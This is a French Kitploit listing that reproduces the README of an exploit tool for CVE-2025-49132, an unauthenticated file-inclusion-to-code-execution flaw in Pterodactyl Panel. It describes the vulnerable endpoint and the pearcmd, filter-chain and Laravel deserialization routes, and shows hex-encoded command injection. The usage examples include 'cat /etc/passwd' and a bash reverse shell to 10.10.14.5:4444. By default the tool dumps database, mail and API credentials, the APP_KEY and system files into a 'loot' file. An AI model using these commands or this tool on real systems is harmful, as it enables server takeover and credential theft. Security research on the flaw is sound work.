Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-49132 — Exploit pour Pterodactyl Panel ≤ 1.11.10 - LFI non authentifié vers RCE. | Kitploit
Outils/GitHubGitHub/yoyochaud/cve-2025-49132
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubyoyochaud/cve-2025-49132

CVE-2025-49132

Exploit pour Pterodactyl Panel ≤ 1.11.10 - LFI non authentifié vers RCE.

Voir le dépôt
251il y a 6 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-49132 - Pterodactyl Panel RCE non authentifiée

root@kitploit:~
  ___ __   __ ___      ___   ___  ___  ___        _  _   ___  _  ____  ___ 
 / __|\ \ / /| __|___ |_  ) / _ \|_  )| __|___   | || | / _ \| ||__ / |_  )
| (__  \ V / | _|___|  / / | (_) |/ / |__ \___|  |_  _| \_, /| ||_ \  / / 
 \___|  \_/  |___|    /___| \___//___||___/        |_|   /_/ |_|___/ /___|

Exploit pour Pterodactyl Panel ≤ 1.11.10 - LFI non authentifié vers RCE.

La vulnérabilité

Le point de terminaison /locales/locale.json accepte les paramètres locale et namespace qui sont passés directement au include() de PHP sans nettoyage ni authentification. Le paramètre hash censé prévenir les abus n'est jamais appliqué sur les versions non patchées.

Cela permet :

  • Inclusion de fichier local (LFI) - Lire n'importe quel fichier de configuration .php (identifiants base de données, APP_KEY, mail, session…)
  • Exécution de code à distance (RCE) - Via l'inclusion de pearcmd.php (astuce register_argc_argv + config-create), chaînes de filtres PHP, ou désérialisation Laravel avec la APP_KEY divulguée

Affecté : Pterodactyl Panel ≤ 1.11.10
Corrigé dans : 1.11.11

Pourquoi ce PoC ?

Les PoC originaux utilisent Python requests pour envoyer la charge utile pearcmd. Le problème : requests encode silencieusement dans l'URL les caractères comme <, >, {, } - ce qui casse les balises PHP (<?=system(...)?>) intégrées dans l'URL.

Cet exploit corrige cela avec deux changements clés :

  1. curl pour l'étape 1 - La requête de création de payload utilise curl -g (globoff) via subprocess, contournant complètement l'encodage URL de Python.
  2. hex2bin() pour l'encodage de commande - Au lieu d'injecter la commande brute (qui se brise sur les espaces et caractères spéciaux), la commande est encodée en hexadécimal et décodée côté serveur avec system(hex2bin('...')). L'hexadécimal utilise uniquement 0-9a-f - pas de +, =, &, ni espaces. Ainsi, n'importe quelle commande fonctionne, y compris les shells inversés avec >& et /dev/tcp/.
  3. Chemin PEAR dynamique - Contrairement à de nombreux scripts statiques qui codent en dur /usr/share/php, cet outil supporte pleinement l'argument --pear-dir. Il injecte dynamiquement le chemin personnalisé dans la requête curl brute, permettant l'exploitation de cibles avec des configurations non standard.

Installation

root@kitploit:~
pip install requests

Optionnel (pour les méthodes de chaîne de filtres / désérialisation RCE) :

root@kitploit:~
pip install pycryptodome
git clone https://github.com/synacktiv/php_filter_chain_generator

Utilisation

RCE

root@kitploit:~
# Commande simple
python3 exploit.py http://panel.fr --rce-cmd "id"

# Chaîne de filtres PHP (nécessite php_filter_chain_generator dans PATH)
python3 exploit.py http://panel.fr --rce-filter "id"

# Chaîne de filtres pré-générée
python3 exploit.py http://panel.fr --rce-filter "id" --filter-chain "php://filter/..."

# Désérialisation Laravel via APP_KEY divulguée (nécessite phpggc + pycryptodome)
python3 exploit.py http://panel.fr --rce-d "id"

# RCE avec un autre répertoire pear
python3 exploit.py http://panel.fr --rce-cmd "cat /etc/passwd" --pear-dir /usr/share/php/PEAR

# Shell inversé 
python3 exploit.py http://panel.fr --rce-cmd "/bin/bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"

Dump complet de la configuration (mode par défaut)

root@kitploit:~
# Dump toutes les configurations (identifiants DB, APP_KEY, mail, session, CORS…) + tente une RCE automatique
python3 exploit.py http://panel.fr

Options

Valeurs courantes de --pear-dir

DistributionChemin

Ce que le mode par défaut extrait

Lorsqu'il est exécuté sans --rce-cmd / --rce-filter / --rce-d, l'exploit effectue une extraction complète de la configuration :

  • Base de données - Hôte MySQL, port, utilisateur, mot de passe, nom de la base de données + configuration Redis
  • Application - APP_KEY (→ désérialisation Laravel), version, environnement, mode debug
  • Pterodactyl - Paramètres spécifiques au panel, configuration 2FA, indicateurs de fonctionnalités
  • Session - Pilote, configuration des cookies, paramètres de chiffrement
  • Auth - Configuration de verrouillage, expiration de réinitialisation du mot de passe
  • Services - Clés API externes (Mailgun, Postmark, etc.)
  • Mail - Identifiants SMTP, configuration de l'expéditeur
  • Queue / Cache / Hashing / CORS / Logging / Filesystems
  • Fichiers sensibles - Tente de lire /etc/passwd, nom d'hôte, version du noyau

Un rapport JSON complet est sauvegardé dans loot.json (ou chemin personnalisé via -o).

Crédits

Cet exploit est une amélioration basée sur le PoC de GRodolphe/CVE-2025-49132_poc, lui-même inspiré du PoC original de 0xtensho/CVE-2025-49132-poc.

Télécharger l’outil
  • Automatisation tout-en-un - Au lieu de s'appuyer sur des scripts séparés pour différents vecteurs, cet outil automatise entièrement la surface d'attaque (pearcmd, filtres PHP, désérialisation, LFI .php), vérifiant chaque possibilité pour garantir le chemin RCE le plus fiable.
  • OptionDescription
    targetURL cible (ex. http://panel.pterodactyl.fr)
    --rce-cmd CMDExécute CMD via pearcmd (supporte toute commande, y compris shells inversés)
    --rce-filter CMDExécute CMD via chaîne de filtres PHP
    --filter-chain CHAINUtilise une chaîne php://filter pré-générée (avec --rce-filter)
    --rce-d CMDExécute CMD via désérialisation Laravel
    --pear-dir PATHChemin vers le répertoire pearcmd.php (défaut : /usr/share/php)
    --timeout NDélai d'attente de la requête en secondes (défaut : 10)
    --verify-sslActiver la vérification du certificat SSL (désactivé par défaut)
    -o FILEFichier de rapport de sortie (défaut : loot.json)
    Debian / Ubuntu
    /usr/share/php (défaut)
    openSUSE/usr/share/php/PEAR
    Alpine/usr/share/php84 ou /usr/share/php83
    RHEL / Rocky/usr/share/pear